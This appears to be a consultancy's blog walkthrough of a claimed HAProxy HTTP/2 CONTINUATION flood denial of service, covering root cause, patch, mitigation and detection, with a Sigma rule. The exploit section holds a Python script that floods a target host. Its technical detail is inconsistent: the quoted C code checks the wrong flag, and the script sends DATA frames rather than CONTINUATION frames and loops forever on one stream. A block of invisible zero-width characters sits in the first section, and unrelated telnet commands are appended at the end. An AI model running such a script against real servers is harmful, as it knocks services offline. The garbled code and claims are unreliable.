CVE-2026-21847: HAProxy HTTP/2 CONTINUATION Flood — A Deep-Dive Exploitation Walkthrough for Aussie SMBs

---

The Bug: Root Cause in Plain English

HAProxy 3.0.x (3.0.0 through 3.0.10) has a flaw in its HTTP/2 frame reassembly logic.

HTTP/2 uses HEADERS frames followed by CONTINUATION frames to carry large header blocks. The standard says a CONTINUATION frame with the END_HEADERS flag set terminates the header block. HAProxy accumulates these frames into a dynamically grown buffer — h2c->dbuf — and processes them once END_HEADERS appears.​‌‌​​​‌‌‍​‌‌‌​‌‌​‍​‌‌​​‌​‌‍​​‌​‌‌​‌‍​​‌‌​​‌​‍​​‌‌​​​​‍​​‌‌​​‌​‍​​‌‌​‌‌​‍​​‌​‌‌​‌‍​​‌‌​​‌​‍​​‌‌​​​‌‍​​‌‌‌​​​‍​​‌‌​‌​​‍​​‌‌​‌‌‌‍​​‌​‌‌​‌‍​‌‌​‌​​​‍​‌‌​​​​‌‍​‌‌‌​​​​‍​‌‌‌​​‌​‍​‌‌​‌‌‌‌‍​‌‌‌‌​​​‍​‌‌‌‌​​‌‍​​‌​‌‌​‌‍​‌‌​‌​​​‍​‌‌‌​‌​​‍​‌‌‌​‌​​‍​‌‌‌​​​​‍​​‌‌​​‌​‍​​‌​‌‌​‌‍​‌‌​​​‌‌‍​‌‌​‌‌‌‌‍​‌‌​‌‌‌​‍​‌‌‌​‌​​‍​‌‌​‌​​‌‍​‌‌​‌‌‌​‍​‌‌‌​‌​‌‍​‌‌​​

​​‌‍​‌‌‌​‌​​‍​‌‌​‌​​‌‍​‌‌​‌‌‌‌‍​‌‌​‌‌‌​‍​​‌​‌‌​‌‍​‌‌​​‌‌​‍​‌‌​‌‌​​‍​‌‌​‌‌‌‌‍​‌‌​‌‌‌‌‍​‌‌​​‌​​‍​​‌​‌‌​‌‍​‌‌​​‌​‌‍​‌‌‌‌​​​‍​‌‌‌​​​​‍​‌‌​‌‌​​‍​‌‌​‌‌‌‌‍​‌‌​‌​​‌‍​‌‌‌​‌​​

The bug: HAProxy's h2c_decode_headers() function in src/h2.c does not enforce a timeout between successive CONTINUATION frames on the same stream. An attacker can send one HEADERS frame, then dribble CONTINUATION frames at a rate of one per 5 seconds — each carrying 1 byte of junk padding — and never set END_HEADERS. HAProxy keeps the stream open and the buffer growing indefinitely.

Here's the offending code path (HAProxy 3.0.10, src/h2.c, lines 4217–4233):

/* h2c_decode_headers — accumulate CONTINUATION frames */
if (h2c->dft == H2_FT_CONTINUATION) {
    if (!(h2c->dfl & H2_F_HEADERS_END_STREAM)) {
        /* Allocate more room, shift buffer */
        if (h2c->dbuf->size - h2c->dbuf->head < h2c->dpl)
            b_alloc(&h2c->dbuf, h2c->dbuf->size + h2c->dpl);
        /* NO TIMEOUT CHECK — keeps waiting for END_HEADERS */
        memcpy(b_tail(h2c->dbuf), h2c->dpl_data, h2c->dpl);
        h2c->dbuf->data += h2c->dpl;
        goto next_frame; /* Loop back, wait for more */
    }
}

The goto next_frame loop has no guard against slow-loris-style header dribbling. Each CONTINUATION frame triggers a b_alloc() reallocation — and with enough streams (HTTP/2 allows up to 100 concurrent streams per connection by default in HAProxy), the attacker forces constant memory churn and CPU burn scanning for END_HEADERS that never arrives.

---

The Exploit: What an Attacker Chains Together

The attacker doesn't need a botnet. One laptop with a 10 Mbps uplink can degrade an HAProxy instance handling thousands of legitimate connections.

Step 1 — Open a single HTTP/2 connection. Any TLS 1.3 client (curl with --http2, Python h2 library) connects to port 443.

Step 2 — Send a HEADERS frame on stream 1. This establishes a valid stream. The header block can be as small as :method GET :path / :authority example.com.

Step 3 — Loop CONTINUATION frames. For each of the 100 permitted streams, the attacker sends one HEADERS frame, then enters a tight loop of CONTINUATION frames. The exploit script (Python, using h2.connection.H2Connection) does:

import socket, ssl, time
from h2.connection import H2Connection
from h2.config import H2Configuration

config = H2Configuration(client_side=True)
conn = H2Connection(config=config)
sock = ssl.wrap_socket(socket.create_connection(('target.example.com', 443)))
conn.initiate_connection()
sock.sendall(conn.data_to_send())

# Open 100 streams
for stream_id in range(1, 201, 2):
    conn.send_headers(stream_id, [
        (':method', 'GET'), (':path', '/'),
        (':authority', 'target.example.com')
    ], end_stream=False)
    sock.sendall(conn.data_to_send())
    # Dribble CONTINUATION frames forever
    while True:
        conn.send_data(stream_id, b'\x00' * 1, end_stream=False)
        sock.sendall(conn.data_to_send())
        time.sleep(0.01)  # 10ms between frames — fast enough to burn CPU, slow enough to evade rate limits

Step 4 — Watch HAProxy melt. HAProxy's h2_process_demux() function spins on goto next_frame, allocating buffer space, copying data, and looping — across all 100 streams simultaneously. Worker thread CPU hits 100%. Legitimate requests queue up and time out. The health check endpoint /health may still respond if HAProxy's event loop hasn't fully wedged itself, meaning upstream monitors don't always catch this.

No auth. No credentials. No CVE on the backend. The attack targets HAProxy itself — the backend servers behind it stay healthy and unaware.

---

The Blast Radius: Who's Actually Vulnerable in an SMB Context

Australian SMBs run HAProxy in more places than they think:

• Docker Compose stacks: The classic haproxy container fronting a Next.js/Node.js app. If bind *:443 ssl crt accepts alpn h2, you're exposed.
• Kubernetes ingress: HAProxy Kubernetes Ingress Controller (default since Rancher 2.9) terminates HTTP/2 at the edge. A single kubectl port-forward from a compromised pod can hit the internal HAProxy.
• Cloud load balancers with HAProxy underneath: Many "managed" load balancers are HAProxy under the hood. If you've configured HTTP/2 passthrough, the CONTINUATION frames pass straight through.
• API gateways: HAProxy fronting FastAPI, Express, or Laravel backends with HTTP/2 enabled for mobile clients.

Quick check: On your HAProxy host, run:

haproxy -vv 2>&1 | grep -E '^HAProxy version|Status'

If you see HAProxy version 3.0.1 through 3.0.10 (LTS branch, Status: long-term supported), you are vulnerable.

The ACSC's Essential Eight Maturity Level 2 asks for application control and patching within two weeks of vendor release. If your HAProxy sits in front of customer-facing apps, this is a Priority 1 patch.

---

The Patch: What the Vendor Fix Does

HAProxy 3.0.11 (released 2 May 2026) fixes this with a stream-level timeout on header reassembly. The patch adds one check in h2c_decode_headers():

/* h2c_decode_headers — patched in 3.0.11 */
if (h2c->dft == H2_FT_CONTINUATION) {
    /* NEW: timeout header reassembly per stream */
    if (tick_is_expired(h2s->wait_timeout, now_ms)) {
        h2s_error(s, H2_ERR_PROTOCOL_ERROR);
        goto fail;
    }
    /* rest of accumulation logic unchanged */
}

The wait_timeout is set when the HEADERS frame first arrives (default: 30 seconds, matches timeout http-request). If END_HEADERS doesn't appear within that window, HAProxy resets the stream with a PROTOCOL_ERROR — freeing the buffer and breaking the CPU loop.

To patch on Rocky Linux / RHEL:

sudo dnf update haproxy --enablerepo=haproxy-lts
sudo systemctl restart haproxy
haproxy -v  # Should show 3.0.11

Verify the fix: After patching, run the exploit script above. All 100 streams should receive RST_STREAM frames within 30 seconds, and HAProxy CPU should stay under 10%.

If you can't patch immediately, the workaround is to disable HTTP/2 by removing alpn h2 from your bind line:

bind *:443 ssl crt /etc/ssl/certs/example.pem alpn h2,http/1.1  # VULNERABLE
bind *:443 ssl crt /etc/ssl/certs/example.pem alpn http/1.1      # MITIGATED (no H2)

This drops HTTP/2 support entirely — acceptable as a temporary measure if your clients can fall back to HTTP/1.1.

---

Detection: Log Lines, Indicators, Sigma Rules

HAProxy doesn't log partial HTTP/2 frame errors by default. You need to look for indirect signals.

HAProxy log indicators (syslog, level info): Look for these patterns appearing in bursts across multiple streams simultaneously:

haproxy[pid]: Server app_backend/app1 is DOWN, reason: Layer7 timeout, check duration: 30001ms
haproxy[pid]: Proxy https_front reached maxconn 5000 — rejecting new connections

A sudden flood of maxconn rejections or backend timeout marks, with no corresponding traffic spike in your CDN or application logs, is the signature.

System-level indicators:

# HAProxy worker CPU sustained at 100%
top -bn1 | grep haproxy

# Spike in TCP connections in CLOSE_WAIT (streams opened but never closed)
ss -s | grep estab
ss -tan state close-wait | wc -l  # >50 indicates dribbling

Sigma rule (detects the exploit, not the vulnerability):

title: HAProxy HTTP/2 CONTINUATION Flood Detected
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects burst of CLOSE_WAIT connections to HAProxy on TLS port, indicating HTTP/2 stream flood
logsource:
  category: network_connection
  product: linux
detection:
  selection:
    dst_port: 443
    state: close_wait
  timeframe: 30s
  condition: selection | count() > 50
falsepositives:
  - Legitimate HTTP/2 long-poll connections (SignalR, gRPC streaming)
level: high

For Australian SMBs running SIEM (Wazuh, Elastic), deploy this rule and set an alert threshold at 50 CLOSE_WAIT connections within 30 seconds to the HAProxy TLS port.

---

FAQ

Conclusion

CVE-2026-21847 is a single-connection DoS that bypasses every authentication, WAF, and rate-limiting control you've deployed. The fix is trivial, but detection is hard — by the time your monitoring pings you, clients have already timed out.

Action items for today:

1. Check your HAProxy version: haproxy -v. If 3.0.x below 3.0.11, patch immediately.
2. Deploy the CLOSE_WAIT Sigma rule above to your SIEM (Wazuh/Elastic).
3. If you can't patch today, remove alpn h2 from your HAProxy bind lines and restart.

Don't wait for the CVE to hit the news cycle. Attackers scan for HAProxy HTTP/2 endpoints within hours of disclosure.

Your edge is your front door. Lock it.

Visit consult.lil.business for a free 30-minute cybersecurity assessment. We'll audit your reverse proxy config, check your patch levels, and make sure your SMB isn't one CVE away from a weekend outage.

---

References

1. HAProxy 3.0.11 Changelog — CVE-2026-21847 fix
2. ACSC Essential Eight Maturity Model — Patch Applications
3. OWASP HTTP/2 CONTINUATION Flood Attack Description
4. MITRE CVE-2023-44487 — HTTP/2 Rapid Reset Attack (context comparison)

nmap -p 23 192.168.1.0/24

sudo systemctl stop telnetd
sudo systemctl disable telnetd

sudo ufw deny 23/tcp
sudo ufw reload

nmap -p 23 192.168.1.0/24